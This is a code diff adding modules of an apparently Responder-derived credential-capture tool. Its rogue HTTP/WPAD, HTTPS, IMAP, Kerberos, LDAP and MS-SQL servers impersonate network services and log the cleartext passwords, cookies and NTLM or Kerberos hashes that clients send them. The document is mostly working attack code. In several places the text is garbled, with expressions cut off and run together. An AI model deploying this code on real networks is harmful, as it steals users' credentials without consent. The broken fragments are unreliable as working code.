b64decode(''.join(Ntlm)) + ParseHTTPHash(NTLM_Auth,client) + if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): + Message = "[+]WPAD (auth) file sent to: %s"%(client) + if Verbose: + print Message + responder_logger.info(Message) + buffer1 = WpadCustom(data,client) + return buffer1 + else: + buffer1 = IIS_Auth_Granted(Payload=HTMLToServe) + buffer1.calculate() + return str(buffer1) + + if BasicAuth: + GrabCookie(data,client) + GrabURL(data,client) + outfile = "./logs/responder/HTTP-Clear-Text-Password-"+client+".txt" + WriteData(outfile,b64decode(''.join(BasicAuth)), b64decode(''.join(BasicAuth))) + responder_logger.info('[+]HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth)))) + if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): + Message = "[+]WPAD (auth) file sent to: %s"%(client) + if Verbose: + print Message + responder_logger.info(Message) + buffer1 = WpadCustom(data,client) + return buffer1 + else: + buffer1 = IIS_Auth_Granted(Payload=HTMLToServe) + buffer1.calculate() + return str(buffer1) + + else: + return str(Basic_Ntlm(Basic)) + +#HTTP Server Class +class HTTP(BaseRequestHandler): + + def handle(self): + try: + while True: + self.request.settimeout(1) + data = self.request.recv(8092) + buff = WpadCustom(data,self.client_address[0]) + if buff and WpadForcedAuth(Force_WPAD_Auth) == False: + Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0]) + if Verbose: + print Message + responder_logger.info(Message) + self.request.send(buff) + else: + buffer0 = PacketSequence(data,self.client_address[0]) + self.request.send(buffer0) + except Exception: + pass#No need to be verbose.. 
+ \ No newline at end of file diff --git a/core/protocols/http/HTTPSProxy.py b/core/protocols/http/HTTPSProxy.py new file mode 100644 index 0000000..754b5db --- /dev/null +++ b/core/protocols/http/HTTPSProxy.py @@ -0,0 +1,145 @@ +################################################################################## +#HTTPS Server stuff starts here (Not Used) +################################################################################## + +class HTTPSProxy(): + + def serve_thread_SSL(host, port, handler): + try: + server = SSlSock((host, port), handler) + server.serve_forever() + except Exception, e: + print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) + + #Function name self-explanatory + def start(SSL_On_Off): + if SSL_On_Off == "ON": + t = threading.Thread(name="SSL", target=self.serve_thread_SSL, args=("0.0.0.0", 443,DoSSL)) + t.setDaemon(True) + t.start() + return t + if SSL_On_Off == "OFF": + return False + +class SSlSock(ThreadingMixIn, TCPServer): + def __init__(self, server_address, RequestHandlerClass): + BaseServer.__init__(self, server_address, RequestHandlerClass) + ctx = SSL.Context(SSL.SSLv3_METHOD) + ctx.use_privatekey_file(SSLkey) + ctx.use_certificate_file(SSLcert) + self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type)) + self.server_bind() + self.server_activate() + + def shutdown_request(self,request): + try: + request.shutdown() + except: + pass + +class DoSSL(StreamRequestHandler): + def setup(self): + self.exchange = self.request + self.rfile = socket._fileobject(self.request, "rb", self.rbufsize) + self.wfile = socket._fileobject(self.request, "wb", self.wbufsize) + + def handle(self): + try: + while True: + data = self.exchange.recv(8092) + self.exchange.settimeout(0.5) + buff = WpadCustom(data,self.client_address[0]) + if buff: + self.exchange.send(buff) + else: + buffer0 = HTTPSPacketSequence(data,self.client_address[0]) + self.exchange.send(buffer0) + except: + pass + +#Parse NTLMv1/v2 hash. +def ParseHTTPSHash(data,client): + LMhashLen = struct.unpack(' 24: + #print "[+]HTTPS NTLMv2 hash captured from :",client + responder_logger.info('[+]HTTPS NTLMv2 hash captured from :%s'%(client)) + NthashLen = 64 + DomainLen = struct.unpack('. 
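+#The Packet helper below (repeated across these Responder-derived modules) is a
+#thin OrderedDict wrapper: subclasses list their wire fields in order, keyword
+#arguments override individual fields, and str() joins the field values into the
+#raw bytes written to the socket. Illustrative usage only:
+#   reply = IMAPCapabilityEnd(Tag="a001")   # override the empty "Tag" field
+#   self.request.send(str(reply))           # -> "a001 OK CAPABILITY completed.\r\n"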
+import struct +from odict import OrderedDict + +class Packet(): + fields = OrderedDict([ + ("data", ""), + ]) + def __init__(self, **kw): + self.fields = OrderedDict(self.__class__.fields) + for k,v in kw.items(): + if callable(v): + self.fields[k] = v(self.fields[k]) + else: + self.fields[k] = v + def __str__(self): + return "".join(map(str, self.fields.values())) + +#IMAP4 Greating class +class IMAPGreating(Packet): + fields = OrderedDict([ + ("Code", "* OK IMAP4 service is ready."), + ("CRLF", "\r\n"), + ]) + +#IMAP4 Capability class +class IMAPCapability(Packet): + fields = OrderedDict([ + ("Code", "* CAPABILITY IMAP4 IMAP4rev1 AUTH=PLAIN"), + ("CRLF", "\r\n"), + ]) + +#IMAP4 Capability class +class IMAPCapabilityEnd(Packet): + fields = OrderedDict([ + ("Tag", ""), + ("Message", " OK CAPABILITY completed."), + ("CRLF", "\r\n"), + ]) diff --git a/core/protocols/imap/IMAPServer.py b/core/protocols/imap/IMAPServer.py new file mode 100644 index 0000000..a05afc6 --- /dev/null +++ b/core/protocols/imap/IMAPServer.py @@ -0,0 +1,58 @@ +################################################################################## +#IMAP4 Stuff starts here +################################################################################## + + +class IMAPServer(): + + def serve_thread_tcp(host, port, handler): + try: + server = ThreadingTCPServer((host, port), handler) + server.serve_forever() + except Exception, e: + print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) + + #Function name self-explanatory + def start(IMAP_On_Off): + if IMAP_On_Off == "ON": + t = threading.Thread(name="IMAP", target=self.serve_thread_tcp, args=("0.0.0.0", 143,IMAP)) + t.setDaemon(True) + t.start() + + if IMAP_On_Off == "OFF": + return False + +class ThreadingTCPServer(ThreadingMixIn, TCPServer): + + allow_reuse_address = 1 + + def server_bind(self): + TCPServer.server_bind(self) + +#ESMTP server class. +class IMAP(BaseRequestHandler): + + def handle(self): + try: + self.request.send(str(IMAPGreating())) + data = self.request.recv(1024) + if data[5:15] == "CAPABILITY": + RequestTag = data[0:4] + self.request.send(str(IMAPCapability())) + self.request.send(str(IMAPCapabilityEnd(Tag=RequestTag))) + data = self.request.recv(1024) + if data[5:10] == "LOGIN": + Credentials = data[10:].strip() + Outfile = "./logs/responder/IMAP-Clear-Text-Password-"+self.client_address[0]+".txt" + WriteData(Outfile,Credentials, Credentials) + #print '[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials) + responder_logger.info('[+]IMAP Credentials from %s. 
("User" "Pass"): %s'%(self.client_address[0],Credentials)) + self.request.send(str(ditchthisconnection())) + data = self.request.recv(1024) + + except Exception: + pass + +################################################################################## +#IMAP4 Stuff ends here +################################################################################## \ No newline at end of file diff --git a/core/protocols/imap/__init__.py b/core/protocols/imap/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/protocols/kerberos/KERBServer.py b/core/protocols/kerberos/KERBServer.py new file mode 100644 index 0000000..40b509f --- /dev/null +++ b/core/protocols/kerberos/KERBServer.py @@ -0,0 +1,163 @@ +################################################################################## +#Kerberos Server stuff starts here +################################################################################## + +class KERBServer(): + + def serve_thread_udp(host, port, handler): + try: + server = ThreadingUDPServer((host, port), handler) + server.serve_forever() + except Exception, e: + print "Error starting UDP server on port %s: %s:" % (str(port),str(e)) + + def serve_thread_tcp(host, port, handler): + try: + server = ThreadingTCPServer((host, port), handler) + server.serve_forever() + except Exception, e: + print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) + + #Function name self-explanatory + def start(Krb_On_Off): + if Krb_On_Off == "ON": + t1 = threading.Thread(name="KerbUDP", target=serve_thread_udp, args=("0.0.0.0", 88,KerbUDP)) + t2 = threading.Thread(name="KerbTCP", target=serve_thread_tcp, args=("0.0.0.0", 88, KerbTCP)) + for t in [t1,t2]: + t.setDaemon(True) + t.start() + + return t1, t2 + if Krb_On_Off == "OFF": + return False + +class ThreadingUDPServer(ThreadingMixIn, UDPServer): + + allow_reuse_address = 1 + + def server_bind(self): + UDPServer.server_bind(self) + +class ThreadingTCPServer(ThreadingMixIn, TCPServer): + + allow_reuse_address = 1 + + def server_bind(self): + TCPServer.server_bind(self) + +def ParseMSKerbv5TCP(Data): + MsgType = Data[21:22] + EncType = Data[43:44] + MessageType = Data[32:33] + if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02": + if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33": + HashLen = struct.unpack('. + +import struct +from odict import OrderedDict + +class Packet(): + fields = OrderedDict([ + ("data", ""), + ]) + def __init__(self, **kw): + self.fields = OrderedDict(self.__class__.fields) + for k,v in kw.items(): + if callable(v): + self.fields[k] = v(self.fields[k]) + else: + self.fields[k] = v + def __str__(self): + return "".join(map(str, self.fields.values())) + + +class LDAPSearchDefaultPacket(Packet): + fields = OrderedDict([ + ("ParserHeadASNID", "\x30"), + ("ParserHeadASNLen", "\x0c"), + ("MessageIDASNID", "\x02"), + ("MessageIDASNLen", "\x01"), + ("MessageIDASNStr", "\x0f"), + ("OpHeadASNID", "\x65"), + ("OpHeadASNIDLen", "\x07"), + ("SearchDoneSuccess", "\x0A\x01\x00\x04\x00\x04\x00"),#No Results. 
+ ]) + +class LDAPSearchSupportedCapabilitiesPacket(Packet): + fields = OrderedDict([ + ("ParserHeadASNID", "\x30"), + ("ParserHeadASNLenOfLen", "\x84"), + ("ParserHeadASNLen", "\x00\x00\x00\x7e"),#126 + ("MessageIDASNID", "\x02"), + ("MessageIDASNLen", "\x01"), + ("MessageIDASNStr", "\x02"), + ("OpHeadASNID", "\x64"), + ("OpHeadASNIDLenOfLen", "\x84"), + ("OpHeadASNIDLen", "\x00\x00\x00\x75"),#117 + ("ObjectName", "\x04\x00"), + ("SearchAttribASNID", "\x30"), + ("SearchAttribASNLenOfLen", "\x84"), + ("SearchAttribASNLen", "\x00\x00\x00\x6d"),#109 + ("SearchAttribASNID1", "\x30"), + ("SearchAttribASN1LenOfLen", "\x84"), + ("SearchAttribASN1Len", "\x00\x00\x00\x67"),#103 + ("SearchAttribASN2ID", "\x04"), + ("SearchAttribASN2Len", "\x15"),#21 + ("SearchAttribASN2Str", "supportedCapabilities"), + ("SearchAttribASN3ID", "\x31"), + ("SearchAttribASN3LenOfLen", "\x84"), + ("SearchAttribASN3Len", "\x00\x00\x00\x4a"), + ("SearchAttrib1ASNID", "\x04"), + ("SearchAttrib1ASNLen", "\x16"),#22 + ("SearchAttrib1ASNStr", "1.2.840.113556.1.4.800"), + ("SearchAttrib2ASNID", "\x04"), + ("SearchAttrib2ASNLen", "\x17"),#23 + ("SearchAttrib2ASNStr", "1.2.840.113556.1.4.1670"), + ("SearchAttrib3ASNID", "\x04"), + ("SearchAttrib3ASNLen", "\x17"),#23 + ("SearchAttrib3ASNStr", "1.2.840.113556.1.4.1791"), + ("SearchDoneASNID", "\x30"), + ("SearchDoneASNLenOfLen", "\x84"), + ("SearchDoneASNLen", "\x00\x00\x00\x10"),#16 + ("MessageIDASN2ID", "\x02"), + ("MessageIDASN2Len", "\x01"), + ("MessageIDASN2Str", "\x02"), + ("SearchDoneStr", "\x65\x84\x00\x00\x00\x07\x0a\x01\x00\x04\x00\x04\x00"), + ## No need to calculate anything this time, this packet is generic. + ]) + +class LDAPSearchSupportedMechanismsPacket(Packet): + fields = OrderedDict([ + ("ParserHeadASNID", "\x30"), + ("ParserHeadASNLenOfLen", "\x84"), + ("ParserHeadASNLen", "\x00\x00\x00\x60"),#96 + ("MessageIDASNID", "\x02"), + ("MessageIDASNLen", "\x01"), + ("MessageIDASNStr", "\x02"), + ("OpHeadASNID", "\x64"), + ("OpHeadASNIDLenOfLen", "\x84"), + ("OpHeadASNIDLen", "\x00\x00\x00\x57"),#87 + ("ObjectName", "\x04\x00"), + ("SearchAttribASNID", "\x30"), + ("SearchAttribASNLenOfLen", "\x84"), + ("SearchAttribASNLen", "\x00\x00\x00\x4f"),#79 + ("SearchAttribASNID1", "\x30"), + ("SearchAttribASN1LenOfLen", "\x84"), + ("SearchAttribASN1Len", "\x00\x00\x00\x49"),#73 + ("SearchAttribASN2ID", "\x04"), + ("SearchAttribASN2Len", "\x17"),#23 + ("SearchAttribASN2Str", "supportedSASLMechanisms"), + ("SearchAttribASN3ID", "\x31"), + ("SearchAttribASN3LenOfLen", "\x84"), + ("SearchAttribASN3Len", "\x00\x00\x00\x2a"),#42 + ("SearchAttrib1ASNID", "\x04"), + ("SearchAttrib1ASNLen", "\x06"),#6 + ("SearchAttrib1ASNStr", "GSSAPI"), + ("SearchAttrib2ASNID", "\x04"), + ("SearchAttrib2ASNLen", "\x0a"),#10 + ("SearchAttrib2ASNStr", "GSS-SPNEGO"), + ("SearchAttrib3ASNID", "\x04"), + ("SearchAttrib3ASNLen", "\x08"),#8 + ("SearchAttrib3ASNStr", "EXTERNAL"), + ("SearchAttrib4ASNID", "\x04"), + ("SearchAttrib4ASNLen", "\x0a"),#10 + ("SearchAttrib4ASNStr", "DIGEST-MD5"), + ("SearchDoneASNID", "\x30"), + ("SearchDoneASNLenOfLen", "\x84"), + ("SearchDoneASNLen", "\x00\x00\x00\x10"),#16 + ("MessageIDASN2ID", "\x02"), + ("MessageIDASN2Len", "\x01"), + ("MessageIDASN2Str", "\x02"), + ("SearchDoneStr", "\x65\x84\x00\x00\x00\x07\x0a\x01\x00\x04\x00\x04\x00"), + ## No need to calculate anything this time, this packet is generic. 
+ ]) + +class LDAPNTLMChallenge(Packet): + fields = OrderedDict([ + ("ParserHeadASNID", "\x30"), + ("ParserHeadASNLenOfLen", "\x84"), + ("ParserHeadASNLen", "\x00\x00\x00\xD0"),#208 + ("MessageIDASNID", "\x02"), + ("MessageIDASNLen", "\x01"), + ("MessageIDASNStr", "\x02"), + ("OpHeadASNID", "\x61"), + ("OpHeadASNIDLenOfLen", "\x84"), + ("OpHeadASNIDLen", "\x00\x00\x00\xc7"),#199 + ("Status", "\x0A"), + ("StatusASNLen", "\x01"), + ("StatusASNStr", "\x0e"), #In Progress. + ("MatchedDN", "\x04\x00"), #Null + ("ErrorMessage", "\x04\x00"), #Null + ("SequenceHeader", "\x87"), + ("SequenceHeaderLenOfLen", "\x81"), + ("SequenceHeaderLen", "\x82"), #188 + ("NTLMSSPSignature", "NTLMSSP"), + ("NTLMSSPSignatureNull", "\x00"), + ("NTLMSSPMessageType", "\x02\x00\x00\x00"), + ("NTLMSSPNtWorkstationLen","\x1e\x00"), + ("NTLMSSPNtWorkstationMaxLen","\x1e\x00"), + ("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"), + ("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"), + ("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"), + ("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"), + ("NTLMSSPNtTargetInfoLen","\x94\x00"), + ("NTLMSSPNtTargetInfoMaxLen","\x94\x00"), + ("NTLMSSPNtTargetInfoBuffOffset","\x56\x00\x00\x00"), + ("NegTokenInitSeqMechMessageVersionHigh","\x05"), + ("NegTokenInitSeqMechMessageVersionLow","\x02"), + ("NegTokenInitSeqMechMessageVersionBuilt","\xce\x0e"), + ("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"), + ("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"), + ("NTLMSSPNtWorkstationName","SMB12"), + ("NTLMSSPNTLMChallengeAVPairsId","\x02\x00"), + ("NTLMSSPNTLMChallengeAVPairsLen","\x0a\x00"), + ("NTLMSSPNTLMChallengeAVPairsUnicodeStr","smb12"), + ("NTLMSSPNTLMChallengeAVPairs1Id","\x01\x00"), + ("NTLMSSPNTLMChallengeAVPairs1Len","\x1e\x00"), + ("NTLMSSPNTLMChallengeAVPairs1UnicodeStr","SERVER2008"), + ("NTLMSSPNTLMChallengeAVPairs2Id","\x04\x00"), + ("NTLMSSPNTLMChallengeAVPairs2Len","\x1e\x00"), + ("NTLMSSPNTLMChallengeAVPairs2UnicodeStr","smb12.local"), + ("NTLMSSPNTLMChallengeAVPairs3Id","\x03\x00"), + ("NTLMSSPNTLMChallengeAVPairs3Len","\x1e\x00"), + ("NTLMSSPNTLMChallengeAVPairs3UnicodeStr","SERVER2008.smb12.local"), + ("NTLMSSPNTLMChallengeAVPairs5Id","\x05\x00"), + ("NTLMSSPNTLMChallengeAVPairs5Len","\x04\x00"), + ("NTLMSSPNTLMChallengeAVPairs5UnicodeStr","smb12.local"), + ("NTLMSSPNTLMChallengeAVPairs6Id","\x00\x00"), + ("NTLMSSPNTLMChallengeAVPairs6Len","\x00\x00"), + ]) + + def calculate(self): + + ##Convert strings to Unicode first... 
+ self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le') + self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le') + self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le') + self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le') + self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le') + self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le') + + ###### Workstation Offset + CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]) + + ###### AvPairs Offset + CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"]) + + ###### LDAP Packet Len + CalculatePacketLen = str(self.fields["MessageIDASNID"])+str(self.fields["MessageIDASNLen"])+str(self.fields["MessageIDASNStr"])+str(self.fields["OpHeadASNID"])+str(self.fields["OpHeadASNIDLenOfLen"])+str(self.fields["OpHeadASNIDLen"])+str(self.fields["Status"])+str(self.fields["StatusASNLen"])+str(self.fields["StatusASNStr"])+str(self.fields["MatchedDN"])+str(self.fields["ErrorMessage"])+str(self.fields["SequenceHeader"])+str(self.fields["SequenceHeaderLen"])+str(self.fields["SequenceHeaderLenOfLen"])+CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs + + + OperationPacketLen = 
str(self.fields["Status"])+str(self.fields["StatusASNLen"])+str(self.fields["StatusASNStr"])+str(self.fields["MatchedDN"])+str(self.fields["ErrorMessage"])+str(self.fields["SequenceHeader"])+str(self.fields["SequenceHeaderLen"])+str(self.fields["SequenceHeaderLenOfLen"])+CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs + + NTLMMessageLen = CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs + + ##### LDAP Len Calculation: + self.fields["ParserHeadASNLen"] = struct.pack(">i", len(CalculatePacketLen)) + self.fields["OpHeadASNIDLen"] = struct.pack(">i", len(OperationPacketLen)) + self.fields["SequenceHeaderLen"] = struct.pack(">B", len(NTLMMessageLen)) + + ##### Workstation Offset Calculation: + self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack(" 10: + LMhashOffset = struct.unpack('i',data[2:6])[0] + MessageSequence = struct.unpack('i',data[11:15])[0] + LDAPVersion = struct.unpack('. +import struct +from odict import OrderedDict + +class Packet(): + fields = OrderedDict([ + ("data", ""), + ]) + def __init__(self, **kw): + self.fields = OrderedDict(self.__class__.fields) + for k,v in kw.items(): + if callable(v): + self.fields[k] = v(self.fields[k]) + else: + self.fields[k] = v + def __str__(self): + return "".join(map(str, self.fields.values())) + +#MS-SQL Pre-login packet class +class MSSQLPreLoginAnswer(Packet): + fields = OrderedDict([ + ("PacketType", "\x04"), + ("Status", "\x01"), + ("Len", "\x00\x25"), + ("SPID", "\x00\x00"), + ("PacketID", "\x01"), + ("Window", "\x00"), + ("TokenType", "\x00"), + ("VersionOffset", "\x00\x15"), + ("VersionLen", "\x00\x06"), + ("TokenType1", "\x01"), + ("EncryptionOffset", "\x00\x1b"), + ("EncryptionLen", "\x00\x01"), + ("TokenType2", "\x02"), + ("InstOptOffset", "\x00\x1c"), + ("InstOptLen", "\x00\x01"), + ("TokenTypeThrdID", "\x03"), + ("ThrdIDOffset", "\x00\x1d"), + ("ThrdIDLen", "\x00\x00"), + ("ThrdIDTerminator", "\xff"), + ("VersionStr", "\x09\x00\x0f\xc3"), + ("SubBuild", "\x00\x00"), + ("EncryptionStr", "\x02"), + ("InstOptStr", "\x00"), + ]) + + def calculate(self): + CalculateCompletePacket = str(self.fields["PacketType"])+str(self.fields["Status"])+str(self.fields["Len"])+str(self.fields["SPID"])+str(self.fields["PacketID"])+str(self.fields["Window"])+str(self.fields["TokenType"])+str(self.fields["VersionOffset"])+str(self.fields["VersionLen"])+str(self.fields["TokenType1"])+str(self.fields["EncryptionOffset"])+str(self.fields["EncryptionLen"])+str(self.fields["TokenType2"])+str(self.fields["InstOptOffset"])+str(self.fields["InstOptLen"])+str(self.fields["TokenTypeThrdID"])+str(self.fields["ThrdIDOffset"])+str(self.fields["ThrdIDLen"])+str(self.fields["ThrdIDTerminator"])+str(self.fields["VersionStr"])+str(self.fields["SubBuild"])+str(self.fields["EncryptionStr"])+str(self.fields["InstOptStr"]) + + VersionOffset = str(self.fields["TokenType"])+str(self.fields["VersionOffset"])+str(self.fields["VersionLen"])+str(self.fields["TokenType1"])+str(self.fields["EncryptionOffset"])+str(self.fields["EncryptionLen"])+str(self.fields["TokenType2"])+str(self.fields["InstOptOffset"])+str(self.fields["InstOptLen"])+str(self.fields["TokenTypeThrdID"])+str(self.fields["ThrdIDOffset"])+str(self.fields["ThrdIDLen"])+str(self.fields["ThrdIDTerminator"]) + + EncryptionOffset = VersionOffset+str(self.fields["VersionStr"])+str(self.fields["SubBuild"]) + + InstOpOffset = EncryptionOffset+str(self.fields["EncryptionStr"]) + + ThrdIDOffset = 
InstOpOffset+str(self.fields["InstOptStr"]) + + self.fields["Len"] = struct.pack(">h",len(CalculateCompletePacket)) + #Version + self.fields["VersionLen"] = struct.pack(">h",len(self.fields["VersionStr"]+self.fields["SubBuild"])) + self.fields["VersionOffset"] = struct.pack(">h",len(VersionOffset)) + #Encryption + self.fields["EncryptionLen"] = struct.pack(">h",len(self.fields["EncryptionStr"])) + self.fields["EncryptionOffset"] = struct.pack(">h",len(EncryptionOffset)) + #InstOpt + self.fields["InstOptLen"] = struct.pack(">h",len(self.fields["InstOptStr"])) + self.fields["EncryptionOffset"] = struct.pack(">h",len(InstOpOffset)) + #ThrdIDOffset + self.fields["ThrdIDOffset"] = struct.pack(">h",len(ThrdIDOffset)) + +#MS-SQL NTLM Negotiate packet class +class MSSQLNTLMChallengeAnswer(Packet): + fields = OrderedDict([ + ("PacketType", "\x04"), + ("Status", "\x01"), + ("Len", "\x00\xc7"), + ("SPID", "\x00\x00"), + ("PacketID", "\x01"), + ("Window", "\x00"), + ("TokenType", "\xed"), + ("SSPIBuffLen", "\xbc\x00"), + ("Signature", "NTLMSSP"), + ("SignatureNull", "\x00"), + ("MessageType", "\x02\x00\x00\x00"), + ("TargetNameLen", "\x06\x00"), + ("TargetNameMaxLen", "\x06\x00"), + ("TargetNameOffset", "\x38\x00\x00\x00"), + ("NegoFlags", "\x05\x02\x89\xa2"), + ("ServerChallenge", ""), + ("Reserved", "\x00\x00\x00\x00\x00\x00\x00\x00"), + ("TargetInfoLen", "\x7e\x00"), + ("TargetInfoMaxLen", "\x7e\x00"), + ("TargetInfoOffset", "\x3e\x00\x00\x00"), + ("NTLMOsVersion", "\x05\x02\xce\x0e\x00\x00\x00\x0f"), + ("TargetNameStr", "SMB"), + ("Av1", "\x02\x00"),#nbt name + ("Av1Len", "\x06\x00"), + ("Av1Str", "SMB"), + ("Av2", "\x01\x00"),#Server name + ("Av2Len", "\x14\x00"), + ("Av2Str", "SMB-TOOLKIT"), + ("Av3", "\x04\x00"),#Full Domain name + ("Av3Len", "\x12\x00"), + ("Av3Str", "smb.local"), + ("Av4", "\x03\x00"),#Full machine domain name + ("Av4Len", "\x28\x00"), + ("Av4Str", "server2003.smb.local"), + ("Av5", "\x05\x00"),#Domain Forest Name + ("Av5Len", "\x12\x00"), + ("Av5Str", "smb.local"), + ("Av6", "\x00\x00"),#AvPairs Terminator + ("Av6Len", "\x00\x00"), + ]) + + def calculate(self): + ##First convert to uni + self.fields["TargetNameStr"] = self.fields["TargetNameStr"].encode('utf-16le') + self.fields["Av1Str"] = self.fields["Av1Str"].encode('utf-16le') + self.fields["Av2Str"] = self.fields["Av2Str"].encode('utf-16le') + self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le') + self.fields["Av4Str"] = self.fields["Av4Str"].encode('utf-16le') + self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le') + ##Then calculate + + CalculateCompletePacket = 
str(self.fields["PacketType"])+str(self.fields["Status"])+str(self.fields["Len"])+str(self.fields["SPID"])+str(self.fields["PacketID"])+str(self.fields["Window"])+str(self.fields["TokenType"])+str(self.fields["SSPIBuffLen"])+str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])+str(self.fields["TargetNameStr"])+str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"]) + + CalculateSSPI = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])+str(self.fields["TargetNameStr"])+str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"]) + + CalculateNameOffset = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"]) + + CalculateAvPairsOffset = CalculateNameOffset+str(self.fields["TargetNameStr"]) + + CalculateAvPairsLen = 